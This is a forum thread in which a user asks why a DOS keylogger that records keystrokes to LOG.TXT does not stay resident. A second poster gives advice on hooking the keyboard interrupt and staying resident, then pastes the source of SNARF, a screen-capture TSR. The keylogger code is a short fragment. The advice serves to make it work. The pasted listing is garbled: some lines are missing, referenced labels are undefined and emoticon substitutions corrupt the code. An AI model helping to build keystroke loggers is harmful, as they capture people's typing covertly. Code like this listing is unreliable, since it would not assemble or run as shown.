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Index > DOS > keylogger TSR

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Joined: 26 Jan 2018
Posts: 13
luish 27 Jan 2018, 10:59
i code a keylogger and i want that my keylogger terminate and stay resident however when keylogger terminate doesn't retrieve keystrokes. why my keylogger don't terminate and stau resident?
ORG 100h
mov dx, KEYLOGGER ; DX = bytes in resident section
mov cl, 4
shr dx, cl ; Convert to number of paragraphs
inc dx ; plus one
mov ax, 3100h ; Request Function 31h, error code=0
int 21h ; Terminate-and-stay-resident
HANDLE          DW      0
FILE_NAME       DB      "LOG.TXT",0
SCAN_CODE       DB      0    
Post 27 Jan 2018, 10:59
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Joined: 04 Sep 2009
Posts: 414
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 27 Jan 2018, 18:23
        AH = 31h
        AL = return code
        DX = number of paragraphs to keep resident    

DX = (LastResidentByte+15)/16
org 100h
jmp InstallCode

You must get/set interrupt vector 09h by function AH=35h/25h.
You must get/set current PSP by function AH=50h/51h before file operation.

smaller is better
Post 27 Jan 2018, 18:23
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Joined: 04 Sep 2009
Posts: 414
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 27 Jan 2018, 18:31
It would be useful to define some buffer for which for overcrowding to enrol in the file so that it lasts it like most briefly.
You must also save used registers and set current DS in KEYLOGGER and return from it using IRET or JMP to old 09h interrupt vector.
See also SNARF TSR:
;SNARF.ASM      25-May-2007     Loren Blaney    loren_blaney@idcomm.com
;Version 1.5 (Also see errMsg and MessageOK.)
;This takes a snapshot of the currently displayed graphic or text screen and
; saves the image in a file called SNARFxxx.BMP in the current directory. It
; works for CGA, EGA, VGA and VESA graphic and text modes, and runs under DOS
; and Windows. The code is based on a TSR presented in the MS-DOS Encyclopedia
; written by Richard Wilton (and painstakingly typed in by Jim Phillips).
;Assemble with MASM 6.11 (5.10 gives phase errors).
;This program is free software; you can redistribute it and/or modify it under
; the terms of the GNU General Public License version 2 as published by the
; Free Software Foundation.
;This program is distributed in the hope that it will be useful, but WITHOUT
; ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
; FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
; details.
;You should have received a copy of the GNU General Public License along with
; this program (in the file LICENSE.TXT); if not, write to the Free Software
; Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
;V1.2, 21-Jul-2006, Distributed on Internet
;V1.3,  1-Sep-2006, Support VESA 2.0 by masking off bits 13, 14 & 15 on mode info
;V1.4, 19-Mar-2007, Support some ATI cards that read from window B, instead of A.
;V1.5, 25-May-2007, Add Mihai Ionascu's mods that support old ATI cards. Fix
; glitch with Packard Bell capturing a 24-bit image. (INT 21h clobbers high word
; of eax!)
;V1.6,  4-Apr-2016, added 32-bit modes & dual-font text modes

DefHotKey       EQU     31              ;default hot key scan code (Alt+S)
MultiplexID     EQU     0DAH            ;unique INT 2FH ID value for this TSR

TSRStackSize    EQU     100H            ;resident stack size in bytes

KB_FLAG         EQU     17H             ;offset of shift-key status flag in
                                        ; BIOS keyboard data area
KBIns           EQU     80H             ;bit masks for KB_FLAG
KBCaps          EQU     40H
KBNum           EQU     20H
KBScroll        EQU     10H
KBAlt           EQU     08H
KBCtl           EQU     04H
KBleft          EQU     02H
KBRight         EQU     01H

CR              EQU     0DH
LF              EQU     0AH
TRUE            EQU     -1
FALSE           EQU     0

;                          RAM-Resident Routines



; System verification routines

VerifyDOSState  PROC    NEAR            ; Returns:  carry flag set if DOS
                                        ;           is busy
                PUSH    DS              ; preserve registers
                PUSH    BX
                PUSH    AX

                LDS     BX,CS:ErrorModeAddr
                MOV     AH,[BX]         ; AH = ErrorMode flag

                LDS     BX,CS:InDOSAddr
                MOV     AL,[BX]         ; AL = InDOS flag

                XOR     BX,BX           ; BH = 00H, BL = 00H
                CMP     BL,CS:InISR28   ; carry flag set if INT 28H handler
                                        ; is running
                RCL     BL,01H          ; BL = 01H if handler is running

                CMP     BX,AX           ; carry flag zero if AH = 00H
                                        ; and AL <= BL
                POP     AX              ; restore registers
                POP     BX
                POP     DS
VerifyDOSState  ENDP


VerifyIntState  PROC    NEAR            ; Returns:  carry flag set if hardware
                                        ;           or BIOS is unstable
                PUSH    AX              ; preserve AX

; Verify hardware interrupt status by interrogating Intel 8259A Programmable
; Interrupt Controller

                MOV     AX,00001011B    ;AH = 0, AL = 0CW3 for Intel 8259A
                                        ; (RR = 1, RIS = 1)
                OUT     20H,AL          ; request 8259A's in-service register
                JMP     SHORT L10       ; wait a few cycles
L10:            IN      AL,20H          ; AL = hardware interrupts currently
                                        ; being serviced (bit =1 if in-service)
                CMP     AH,AL
                JC      L11             ; exit if any hardware interrupts still
                                        ; being serviced

; Verify status of BIOS interrupt handlers

                XOR     AL,AL           ; AL = 00H

                CMP     AL,CS:InISR5
                JC      L11             ; exit if currently in INT 05H handler

                CMP     AL,CS:InISR9
                JC      L11             ; exit if currently in INT 09H handler

                CMP     AL,CS:InISR10
                JC      L11             ; exit if currently in INT 010H handler

                CMP     AL,CS:InISR13   ; set carry flag if currently in
                                        ; INT 13H handler
L11:            POP     AX              ; restore AX and return
VerifyIntState  ENDP

; Returns carry flag clear if TSR application can execute

VerifyTSRState  PROC    NEAR            ; Returns: carry flag set if TSR cannot
                                        ;          be activated
                ROL     CS:HotFlag,1    ; carry flag set if (HotFlag = TRUE)
                CMC                     ; flip TRUE to FALSE
                                        ; carry is now set if HotFlag = FALSE
                JC      L20             ; exit if hot key not struck

                ROR     CS:ActiveTSR,1  ; carry flag set if (ActiveTSR = TRUE)
                JC      L20             ; exit if already active

                CALL    VerifyDOSState
                JC      L20             ; exit if DOS is unstable

                CALL    VerifyIntState  ; set carry flag if hardware or BIOS
                                        ; is unstable
L20:            RET
VerifyTSRState  ENDP

; System interrupt handlers

ISR5            PROC    FAR             ; INT 05H handler
                                        ; (BIOS Print Screen)
                INC     CS:InISR5       ; increment status flag
                CALL    CS:PrevISR5     ; chain to previous INT 5 handler

                DEC     CS:InISR5       ; decrement status flag
ISR5            ENDP


ISR8            PROC    FAR             ; INT 08H handler
                PUSHF                   ; (BIOS System Timer Tick)
                CALL    CS:PrevISR8     ; chain to previous INT 8 handler

                CMP     CS:InISR8,0
                JNE     L31             ; exit if already in this handler

                INC     CS:InISR8       ; increment status flag

                STI                     ; interrupts are ok
                CALL    VerifyTSRState
                JC      L30             ; skip if TSR cannot run

                MOV     BYTE PTR CS:ActiveTSR,TRUE
                CALL    TSRapp
                MOV     BYTE PTR CS:ActiveTSR,FALSE

L30:            DEC     CS:InISR8       ; increment status flag
L31:            IRET
ISR8            ENDP


ISR9    PROC    FAR             ;INT 09H handler
                                ;(Keyboard Interrupt IRQ1)
        push    ds              ;preserve registers
        push    ax
        pushf                   ;and flags

        push    cs
        pop     ds              ;ds -> RESIDENT_GROUP

        mov     ah, ds:InISR9   ;if already in this handler
        or      ah, ds:HotFlag  ; or currently processing the hot key
        jne     L47             ; then jump to exit

        inc     ds:InISR9       ;increment status flag
        sti                     ;now interrupts are ok

;Check for hot key

        in      al, 60h         ;al = current scan code
        cmp     al, ds:HotKey   ;test scan code
        jne     L45             ;jump if no match

;Check shift-key flags

        push    ds
        mov     ax, 40h
        mov     ds, ax          ;ds -> BIOS data area
        mov     al, ds:[17h]    ;ah = BIOS shift-key flags
        pop     ds

        and     al, ds:HotKBMask ;al = flags anded with "don't care" mask
        cmp     al, ds:HotKBFlag
        jne     L45             ;jump if shift state does not match

;Eat the hot key (don't pass it to the main program)

        in      al, 61h         ;clear keyboard IRQ
        mov     ah, al
        or      al, 80h
        out     61h, al
        mov     al, ah
        out     61h, al
        mov     al, 20h         ;clear hardware interrupt by sending
        out     20h, al         ; an end-of-interrupt (EOI) to 8259A

        mov     byte ptr ds:HotFlag, TRUE ;hot key is found
        dec     ds:InISR9       ;decrement status flag
        popf                    ;balance stack
        jmp     L49             ;exit

;Chain to previous INT 9 handler
L45:                            ;simulate an int instruction
        dec     ds:InISR9       ;decrement status flag
L47:                            ;flags have been pushed onto the stack
        cli                     ; (necessary if chaining from another TSR)
        call    ds:PrevISR9     ;let previous handler execute
        pop     ax              ;restore registers
        pop     ds


ISR10           PROC    FAR             ; INT 10H handler (BIOS Video I/O)
                INC     CS:InISR10      ; increment status flag

                cmp     ax, 4F02h       ; setting VESA mode?
                jne     isr10a          ; skip if not
                 and    bh, 0BFh        ; make sure linear file buffer is off by
isr10a:                                 ;  clearing bit 14. Fixes ATI problem.
                CALL    CS:PrevISR10    ; chain to previous INT 10H handler

                DEC     CS:InISR10      ; decrement status flag
ISR10           ENDP


ISR13           PROC    FAR             ; INT 13H handler
                                        ; (BIOS Fixed Disk I/O)
                INC     CS:InISR13      ; increment status flag

                CALL    CS:PrevISR13    ; chain to previous INT 13H handler

                PUSHF                   ; preserve returned flags
                DEC     CS:InISR13      ; decrement status flag
                POPF                    ; restore flags register

                STI                     ; enable interrupts
                RET     2               ; simulate IRET without popping flags
ISR13           ENDP


ISR1B           PROC    FAR             ; INT 1BH trap (BIOS Ctrl-Break)
                MOV     BYTE PTR CS:Trap1B,TRUE
ISR1B           ENDP


ISR23           PROC    FAR             ; INT 23H trap (DOS Ctrl-C)
                MOV     BYTE PTR CS:Trap23,TRUE
ISR23           ENDP


ISR24           PROC    FAR             ; INT 24H trap (DOS Critical Error)

                MOV     BYTE PTR CS:Trap24,TRUE
                XOR     AL,AL           ; AL = 00H (DOS 2.X)
                CMP     CS:MajorVersion,2   ; ignore the error
                JE      L50

                MOV     AL,3            ; AL = 03H (DOS 3.X)
                                        ; fail the DOS call in which
                                        ; the critical error occurred
L50:            IRET
ISR24           ENDP


ISR28           PROC    FAR             ; INT 28H handler
                                        ; (DOS Idle Interrupt)
                CALL    CS:PrevISR28    ; chain to previous INT 28H handler

                CMP     CS:InISR28,0
                JNE     L61             ; exit if already inside this handler

                INC     CS:InISR28      ; increment status flag
                CALL    VerifyTSRState
                JC      L60             ; skip if TSR cannot run

                MOV     BYTE PTR CS:ActiveTSR,TRUE
                CALL    TSRapp
                MOV     BYTE PTR CS:ActiveTSR,FALSE

L60:            DEC     CS:InISR28      ; decrement status flag
L61:            IRET
ISR28           ENDP


ISR2F           PROC    FAR             ; INT 2FH handler
                                        ; (DOS Multiplex Interrupt)
                                        ; Caller:   AH = handler ID
                                        ;           AL = function number
                                        ; Returns for function 0:   AL = 0FFH
                                        ; for all other functions:  nothing

                CMP     AH,MultiplexID
                JE      L70             ; jump if handler is requested

                JMP     CS:PrevISR2F    ; chain to previous INT 2FH handler

L70:            TEST    AL,AL
                JNZ     MultiplexIRET   ; jump if reverved or undefined funct

; Function 0:   get installed state

                MOV     AL,0FFH         ; AL = 0FFH (this handler is installed)

MultiplexIRET:  IRET                    ; return from interrupt
ISR2F           ENDP

; AuxInt21--sets ErrorMode while executing INT 21H to force use of the
;       AuxStack instead of the IOStack.
AuxInt21        PROC    NEAR            ; Caller:   registers for INT 21H
                                        ; Returns:  registers from INT 21H
                PUSH    DS
                PUSH    BX
                LDS     BX,ErrorModeAddr
                INC     BYTE PTR [BX]   ; ErrorMode is now nonzero
                POP     BX
                POP     DS

                INT     21H             ; perform DOS function

                PUSH    DS
                PUSH    BX
                LDS     BX,ErrorModeAddr
                DEC     BYTE PTR [BX]   ; restore ErrorMode
                POP     BX
                POP     DS
AuxInt21        ENDP


Int21v          PROC    NEAR            ; perform INT 21H or AuxInt21
                                        ; depending on DOS version
                CMP     DOSVersion,30AH
                JB      L80             ; jump if earlier than 3.1

                INT     21H             ; versions 3.1 and later

L80:            CALL    AuxInt21        ; versions earlier than 3.1
Int21v          ENDP

;                        RAM-Resident Application

TSRapp          PROC    NEAR

; Set up a safe stack

                PUSH    DS              ; save previous DS on previous stack

                PUSH    CS
                POP     DS              ; DS -> RESIDENT_GROUP

                MOV     PrevSP,SP       ; save previous SS:SP
                MOV     PrevSS,SS

                MOV     SS,TSRSS        ; SS:SP -> RESIDENT_STACK
                MOV     SP,TSRSP

                PUSH    ES              ; preserve remaining registers
                .386                    ;80386 required
                CLD                     ; clear direction flag

; Set break and critical error traps

                MOV     CX,NTrap
                MOV     SI,OFFSET RESIDENT_GROUP:StartTrapList

L90:            LODSB                   ; AL = interrupt number
                                        ; DS:SI -> byte past interrupt number

                MOV     BYTE PTR [SI],FALSE     ; zero trap flag

                PUSH    AX              ; preserve AX
                MOV     AH,35H          ; INT 21H function 35H
                                        ; (get interrupt vector)
                INT     21H             ; ES:BX = previous interrupt vector
                MOV     [SI+1],BX       ; save offset and segment
                MOV     [SI+3],ES       ;   of previous handler
                POP     AX              ; AL = interrupt number
                MOV     DX,[SI+5]       ; DS:DX -> this TSR's trap
                MOV     AH,25H          ; INT 21H function 25H
                INT     21H             ; (set interrupt vector)
                ADD     SI,7            ; DS:SI -> next in list

                LOOP    L90

; Disable DOS break checking during disk I/O

                MOV     AX,3300H        ; AH = INT 21H function number
                                        ; AL = 00H (req current break state)
                INT     21H             ; DL = current break state
                MOV     PrevBreak,DL    ; preserve current break state

                XOR     DL,DL           ; DL = 00H (disable disk I/O break
                                        ; checking
                MOV     AX,3301H        ; AL = 01H (set break state)
                INT     21H

; Preserve previous extended error information

                CMP     DOSVersion,30AH
                JB      L91             ; jump if version earlier than 3.1
                PUSH    DS              ; preserve DS
                XOR     BX,BX           ; BX = 00H (required for function 59H)
                MOV     AH,59H          ; INT 21H function 59H
                CALL    Int21v          ; (get extended error info)

                MOV     CS:PrevExtErrDS,DS
                POP     DS
                MOV     PrevExtErrAX,AX ; preserve error information
                MOV     PrevExtErrBX,BX ; in data structure
                MOV     PrevExtErrCX,CX
                MOV     PrevExtErrDX,DX
                MOV     PrevExtErrSI,SI
                MOV     PrevExtErrDI,DI
                MOV     PrevExtErrES,ES

; Inform DOS about current PSP

L91:            MOV     AH,51H          ; INT 21H function 51H (get PSP addr)
                CALL    Int21v          ; BX = forground PSP

                MOV     PrevPSP,BX      ; preserve previous PSP

                MOV     BX,TSRPSP       ; BX = resident PSP
                MOV     AH,50H          ; INT 21H function 50H (set PSP addr)
                CALL    Int21v

; Inform DOS about current DTA (not really necessary in this application
; because DTA is not used)

                MOV     AH,2FH          ; INT 21H function 2FH
                INT     21H             ; (get DTA address) into ES:BX
                MOV     PrevDTAoffs,BX
                MOV     PrevDTAseg,ES

                PUSH    DS              ; preserve DS
                MOV     DS,TSRPSP
                MOV     DX,80H          ; DS:DX -> default DTA at PSP:0080H
                MOV     AH,1AH          ; INT 21H function 1AH
                INT     21H             ; (set DTA address)
                POP     DS              ; restore DS

 if 0   ;disable original routine
; Open a file, Write to it, Close it

                MOV     AX,0E07H        ; AH = INT 10H function NUMBER
                                        ; (write teletype)
                                        ; AL = 07H (bell character)
                INT     10H             ; emit beep

                MOV     DX,OFFSET RESIDENT_GROUP:SnapFile
                MOV     AH,3CH          ; INT 21H function 3CH
                                        ; (create file handle)
                MOV     CX,0            ; file attribute
                INT     21H
                JC      L94             ; jump if file not opened

                PUSH    AX              ; push file handle
                MOV     AH,0FH          ; INT 10H func 0FH (get video status)
                INT     10H             ; AL = video mode number
                                        ; AH = number of character columns
                POP     BX              ; BX = file handle

                CMP     AH,80
                JNE     L93             ; jump if not 80 column mode

                MOV     DX,0B800H       ; DX = color video buffer segment
                CMP     AL,3
                JBE     L92             ; jump if color alphanumeric mode

                CMP     AL,7
                JNE     L93             ; jump if not monochrome mode

                MOV     DX,0B000H       ; DX = monochrome video buffer segment

L92:            PUSH    DS
                MOV     DS,DX
                XOR     DX,DX           ; DS:DX -> start of video buffer
                MOV     CX,80*25*2      ; CX = number of bytes to write
                MOV     AH,40H          ; INT 21H function 40H (write file)
                INT     21H
                POP     DS

L93:            MOV     AH,3EH          ; INT 21H function 3EH (close file)
                INT     21H

                MOV     AX,0E07H        ; AH = INT 10H function NUMBER
                                        ; (write teletype)
                                        ; AL = 07H (bell character)
                INT     10H             ; emit beep
;New routine: dumps graphic images to disk file

tblSize equ (modeTblEnd-modeTbl)/8 ;number of entries in modeTbl
scrPag  equ     0462h           ;address of currently displayed page variable

        .386                    ;80386 required
        push    es              ;(for safety)
        sti                     ;enable interrupts
        call    beep            ;indicate capture has started

        mov     ax, 0002h       ;turn off mouse pointer (otherwise int 10h is
        int     33h             ; called, which is not reentrant and it'll blow)

;Preserve location of VESA window (otherwise flood fills get glitched)
        mov     ax, 4F05h       ;CPU video memory window control
        mov     bx, 0100h       ;return location of window A
        int     10h
        mov     savePage, dx    ;record current window location

        mov     ax, 4F05h       ;CPU video memory window control
        mov     bx, 0101h       ;return location of window B
        int     10h
        mov     savePageB, dx   ;record current window location

        mov     ax, 4F03h       ;get video mode
        mov     bx, -1          ;set default mode to -1 in case VESA interrupt
        int     10h             ; functions are not available
        xchg    ax, bx          ;save mode in ax
        and     ax, 1FFFh       ;remove bits 15, 14 and 13 for VBE 3.0

        push    ax
        cmp     ax,0100h
        jb      SkipVESA
        mov     cx, ax
        mov     ax, 4F01h               ;return SVGA info in 256-byte "buffer"
        mov     di, offset RESIDENT_GROUP: buffer
        push    ds
        pop     es
        int     10h
        cmp     ax,004Fh
        jnz     SkipVESA
        mov     word ptr [RESIDENT_GROUP: VESAMode+0], cx
        mov     ax, word ptr [di+18] ;vXSize = buffer(1Cool
        mov     word ptr [RESIDENT_GROUP: VESAMode+2], ax
        mov     ax, word ptr [di+20] ;vYSize = buffer(20)
        mov     word ptr [RESIDENT_GROUP: VESAMode+4], ax
        mov     al,[di+25]
        mov     byte ptr [RESIDENT_GROUP: VESAMode+6],al
        pop     ax

;Find video mode (in ax) in table
        mov     si, offset RESIDENT_GROUP: modeTbl
        mov     cx, tblSize
fm10:   cmp     ax, [si]        ;is si register pointing to mode entry?
        je      fm30            ;skip if so
        add     si, 2*4         ;else next entry in table
        loop    fm10            ;loop for all modes in table
        mov     bx, 1           ;error 1: unsupported mode
;Display error message and error codes
        push    ax              ;save error codes
        push    bx

        mov     ax, 0003h       ;clear screen and set normal text mode
        int     10h

;       mov     ah, 09h         ;display string "Snarf Error: xxxxx xxxxx"
;       mov     dx, offset RESIDENT_GROUP: errMsg
;       int     21h
;The above causes the computer to hang

        mov     si, offset RESIDENT_GROUP: errMsg
        call    textOut

        pop     ax              ;display code originally in bx (1, 2, 3)
        call    numOut          ;(destroys ax and dx)

        mov     al, ' '         ;space character
        int     29h

        pop     ax              ;display code in ax (details)
        call    numOut          ;(destroys ax and dx)

        mov     al, CR          ;carriage return
        int     29h
        mov     al, LF          ;line feed
        int     29h

        mov     ax, 0E07h       ;indicate failure: a regular bell sound
        int     10h
        jmp     getOut9         ;error exit
;(ax=mode, si=pointer to mode's table entry)

        mov     mode, ax
        mov     cx, [si+2]      ;if width = 0 then graphMode:= false
        mov     graphMode, cx   ; else graphMode:= true (non-zero)

        call    setVESA         ;set up VESA parameters
        call    setText         ;set up Text mode parameters

;Determine size of color map (which is only used by planar graphic modes & text)
        xor     di, di          ;di = color map size (entries)
        mov     cx, [si+6]      ;TVD
        cmp     cl, 8           ;di:= if TVD<=8 then 1<<TVD else 0
        jg      fm40
         inc    di              ;di:= 1
         shl    di, cl
;Set up .bmp file header array
; (si = modeTbl entry; di = size of color map)

        xor     eax, eax        ;prepare for 32-bit calculation
        imul    ax, di, 4       ;color map size * 4 (convert entries to bytes)
        add     ax, 54          ;+ header size (bytes)
        mov     word ptr [header+10], ax ;set offset to image data
        push    eax             ;save partial result

        mov     ax, [si+2]      ;TVW
        cmp     graphMode, 0    ;graphics mode?
        jne     fm42            ;skip if so
         mov    ax, textWidth   ;set screen's text width in pixels
         shl    ax, 3           ;*8
        mov     word ptr [header+18], ax ;set image width (pixels)
        shr     ax, 3           ;/8 (all widths are evenly divisible by Cool
        mov     cx, [si+6]      ;*TVD
        cmp     cl, 15          ;15-bit 5:5:5 format?
        jne     fm50            ;skip if not
         inc    cx              ;say that it's 16 bits
        cmp     cl,32
        jne     fm51
        mov     cl,24
        mov     word ptr [header+28], cx ;set bits per pixel
        imul    ax, cx

        xor     ecx, ecx
        mov     cx, [si+4]      ;*TVH
        cmp     graphMode, 0    ;graphics mode?
        jne     fm52            ;skip if so
         mov    cx, textHeight  ;set screen's text height in pixels
         imul   cx, fontHeight
        mov     word ptr [header+22], cx ;set image height (pixels)
        imul    eax, ecx
        pop     ecx
        add     eax, ecx
        mov     dword ptr [header+2], eax ;set size of .bmp file (bytes)

;Open file for output

        mov     ax, offset RESIDENT_GROUP: buffer
        mov     [outPtr], ax    ;set pointer to start of output buffer

        mov     bx, offset RESIDENT_GROUP: fileName+5
        mov     ax, '00'        ;initialize file name counter to "000"
        mov     [bx], ax
        mov     [bx+2], al

;Try to open fileName for input
fn10:   mov     ax, 3D00h
        mov     dx, offset RESIDENT_GROUP: fileName
        int     21h
        pushf                   ;save carry flag
        xchg    bx, ax          ;save handle in bx register
        mov     ah, 3Eh         ;release handle
        int     21h             ;(only a few handles can be open at one time)
        jc      fn20            ;skip if file does not exist

;FileName is already used so try the next name
        mov     bx, offset RESIDENT_GROUP: fileName+7 ;point to end of file name
fn15:   inc     byte ptr [bx]   ;increment counter in name
        cmp     byte ptr [bx], '9'
        jle     fn10            ;loop if valid number
        mov     byte ptr [bx], '0' ;else roll over to next higher place
        dec     bx
        cmp     bx, offset RESIDENT_GROUP: fileName+5 ;999 = maximum count
        jae     fn15            ;loop until unused file name is found
        mov     bx, 2           ;error 2: more than 999 snarf files
        jmp     fail            ;exit if maximum count is exceeded

;File does not exist, so open fileName for output
; (dx=fileName)
fn20:   mov     bx, 3           ;error 3: cannot open output file
        mov     ah, 3Ch         ;function to open a file for output
        xor     cx, cx          ;no attributes
        int     21h
        jc      fail            ;(root directory might be full)
        xchg    bx, ax          ;save handle in bx register

;Write header array
; (bx = file handle)

        mov     cx, 54          ;number of bytes in header array
        push    si              ;save pointer into modeTbl
        mov     si, offset RESIDENT_GROUP: header
wh10:   lodsb                   ;al:= ds:[si++]
        call    byteOut
        loop    wh10
        pop     si

;Write color map (if used)

        mov     al, 0           ;point h/w index register to first color reg.
        mov     dx, 3C7h        ;(assume 256 colors are used)
        out     dx, al

;Get Color Plane Enable register (so we use only the displayed planes)
        mov     dl, 0DAh        ;reset flip-flop (must do each time)
        cmp     mode, 7         ;deal with monochrome mode, which uses a
        jne     wcm05           ; different address
         mov    dl, 0BAh
        cli                     ;for safety
        in      al, dx
        mov     dl, 0C0h        ;select Color Plane Enable register (12h)
        mov     al, 12h+20h     ;12h + Palette Address Source (PAS) bit
        out     dx, al
        inc     dx              ;read the register (3C1h)
        in      al, dx
        mov     planeMask, al   ;save the mask of the displayed planes

        xor     cx, cx          ;first color register = 0
wcm10:  cmp     cx, di          ;while cx < ColorMapSize do...
        jge     wcm30

        cmp     di, 16          ;if ColorMapSize <= 16 then...
        jg      wcm20           ;(skip if not)

;Use the color register that is selected by the palette register
        mov     dl, 0DAh        ;reset flip-flop (must do each time)
        cmp     mode, 7         ;deal with monochrome mode, which uses a
        jne     wcm15           ; different address
         mov    dl, 0BAh
        in      al, dx
        mov     dl, 0C0h        ;select palette register I
        mov     al, cl
        and     al, planeMask   ;however only select the displayed planes
        out     dx, al          ; (PAS bit must be 0)
        inc     dx              ;read palette register (3C1h)
        in      al, dx
        mov     dl, 0C7h        ;select color register J
        out     dx, al
        mov     dl, 0C9h        ;read color register's red, green & blue values
        in      al, dx
        push    ax
        in      al, dx
        push    ax
        in      al, dx          ;63 = full intensity for register

        cmp     mode, 7         ;deal with monochrome mode
        jne     wcm28           ;skip if not

        add     sp, 2*2         ;discard 2 items from stack
        imul    ax, cx, 6       ;provide a gradient of gray shades, making
        cmp     al, 63          ; sure that 0=black (0), 7=white (42), and
        jbe     wcm25           ; F=bright white (63)
         mov    al, 63
        push    ax              ;push new values onto stack
        push    ax
        call    byteOutx4       ;255 = full intensity for .bmp
        pop     ax              ;(.bmp colors are backwards)
        call    byteOutx4
        pop     ax
        call    byteOutx4
        mov     al, 0
        call    byteOut

        inc     cx              ;next color register
        jmp     wcm10
;Make sure Palette Address Source (PAS) bit is set so that the display
; hardware can access the palette registers and display an image.

        mov     dl, 0DAh        ;reset flip-flop (must do each time)
        cmp     mode, 7         ;deal with monochrome mode, which uses a
        jne     wcm35           ; different address
         mov    dl, 0BAh
        in      al, dx
        mov     dl, 0C0h        ;attribute address register
        mov     al, 20h         ;set PAS bit
        out     dx, al

        cmp     graphMode, 0    ;graphics mode?
        je      rp50            ;jump if not (it must be text mode)

;Write the image data
;BMP images are upside down, so bottom scan line is output first
; (bx = file handle; si = modeTbl entry)

        mov     dx, [si+4]      ;dx = Y coord
        dec     dx              ;start at TVH-1
rp10:   xor     cx, cx          ;cx = X coord; start at 0

rp20:   mov     ax, [si+6]      ;TVD
        cmp     al, 1           ;2 colors (monochrome)?
        jne     rpx4            ;skip if not

        mov     di, 0100h       ;set up shift register to loop 8 times
rp25:   call    readPix
        inc     cx              ;next X
        rcr     al, 1           ;pack 8 pixels per byte
        rcl     di, 1
        jnc     rp25            ;loop 8 times

        dec     cx              ;compensate for "inc cx" below
        xchg    ax, di          ;al = values of 8 pixels
        jmp     rp30            ;go output al
        cmp     al, 4           ;16 colors (also 4-color CGA)?
        jne     rpx8            ;skip if not

        call    readPix
        shl     al, 4           ;pack 2 pixels per byte
        xchg    di, ax          ;leftmost pixel is high nibble
        inc     cx
        call    readPix
        and     al, 0Fh
        or      ax, di
        jmp     rp30            ;go output al
        cmp     al, 8           ;256 colors?
        jne     rpx15           ;skip if not

        call    readPix
        jmp     rp30            ;go output al
        cmp     al, 15          ;32768 colors?
        jne     rpx16           ;skip if not

        call    readPix         ;read 5:5:5 format
        jmp     rp28            ;go output 2 bytes
        cmp     al, 16          ;65536 colors?
        jne     rpx24           ;skip if not

        call    readPix
        mov     di, ax          ;convert 5:6:5 format to 5:5:5
        shr     ax, 1           ; which is the form used by .bmp
        and     al, 0E0h
        and     di, 001Fh
        add     ax, di
        call    byteOut
        mov     al, ah
        jmp     rp30            ;go output al
        cmp     al,32           ;4GB?
        jz      rpx32
        cmp     al,24           ;16,777,216 colors?
        jne     rp32            ;skip if not
        call    readPix
        call    byteOut         ;B
        shr     eax, 8
rp28:   call    byteOut         ;G
        mov     al, ah
rp30:   call    byteOut         ;R
        inc     cx              ;next X
        cmp     cx, [si+2]      ;loop until X = TVW
        jne     rp20

        dec     dx              ;next Y (upward)
        jns     rp10
        jmp     rp80

;Convert text screen to graphics and write it to disk file
; Inputs bx = handle
; Register usage:
;  ax = Ch, At, scratch
;  bx = Y = font scan line, handle
;  cl = X = counter for bit pairs in a font byte
;  ch = font byte
;  dl = color of first pixel pair
;  dh = color of second pixel pair
;  si = scratch
;  di = I = character column position
;  bp = J = text line

        pusha                   ;preserve registers
        mov     handle, bx

        mov     bp, textHeight  ;start at bottom text line and scan upward
        dec     bp

rt10:   mov     bx, fontHeight  ;start at bottom scan line in font
        dec     bx

rt20:   xor     di, di          ;for all character columns on a line...

;Get character and its attribute from text screen
;   Ch:= Peek(TextBase, (I-J*TextWidth)*2   + PageOffset);
;   At:= Peek(TextBase, (I-J*TextWidth)*2+1 + PageOffset);
rt30:   mov     es, textBase    ;segment address of text screen
        mov     ax, bp          ;J*TextWidth
        mul     byte ptr textWidth ;ax:= al*textWidth
        add     ax, di          ;+I; column position
        shl     ax, 1           ;*2; address words (not bytes)
        add     ax, pageOffset  ;+PageOffset
        mov     si, ax
        mov     ax, es:[si]     ;al=Ch; ah=At

;Output one scan line of the character
; Byte:= Peek(FontSeg, FontOff+Ch*FontHeight-Y);
        push    ax              ;save attribute (in ah)
        mul     byte ptr fontHeight ;ax:= al*fontHeight
        mov     si, fontOffset
        add     si, ax
        pop     ax              ;restore attribute
        test    ah,1000b
        jz      Skip
        add     si,8*1024
        mov     es, fontSeg
        mov     ch, es:[bx+si]  ;get byte from font table

        mov     al, ah
        and     al, 0Fh         ;al = foreground color
        shr     ah, 4           ;ah = background color

        mov     cl, 4           ;for each pair of bits in ch...
        test    ch, ch          ;test MSB of Byte
rt40:   mov     dh, al          ;assume foreground color
        js      rt42            ;skip if MSB is set
         mov    dh, ah          ;use background color
        shl     ch, 1           ;next bit
        mov     dl, al          ;assume foreground color
        js      rt46            ;skip if MSB is set
         mov    dl, ah          ;use background color
        push    ax              ;save foreground and background colors
        mov     al, dl          ;pack two pixels per byte
        and     al, 0Fh
        shl     dh, 4           ;leftmost pixel is in high nibble
        add     al, dh

        push    bx
        mov     bx, handle
        call    byteOut
        pop     bx
        pop     ax

        shl     ch, 1           ;next bit
        loop    rt40            ;loop for 4 pairs of bits (ch will = 0)

        inc     di              ;next text column (I)
        cmp     di, textWidth   ;loop for all columns
        jne     rt30

        dec     bx              ;next font scan line (Y)
        jns     rt20            ;loop for all scan lines

        dec     bp              ;next line of text (J)
        jns     rt10

        popa                    ;restore registers

;Close output file
        mov     cx, [outPtr]    ;size = outPtr - offset buffer
        sub     cx, offset RESIDENT_GROUP: buffer
        je      rp90            ;skip if nothing to write
         call   wrtBuf          ;bx = handle
         mov    handle, bx      ;error 4
         mov    bx, 4           ;if number of bytes written is not equal the
         jne    fail            ; number of bytes requested then error
         mov    bx, handle
        mov     ah, 3Eh         ;close DOS file
        int     21h             ;bx = handle
        mov     bx, 5           ;error 5
        jc      fail
        jmp     getOut          ;all done

;Routine to make a pleasant sounding beep on the speaker
beep:   push    ax              ;preserve registers
        push    es

        push    40h             ;point to BIOS variables
        pop     es

        mov     al, 0B6h        ;set channel 2 for mode 3
        out     43h, al         ;set command register

        cli                     ;enable speaker and timer 2 output
        in      al, 61h
        push    ax              ;preserve port
        or      al, 03h
        out     61h, al

;Synchronize to the start of a timer tick to get a consistent beep duration
        mov     al, es:[6Ch]    ;get system timer tick
beep10: cmp     al, es:[6Ch]    ;wait for tick count to change
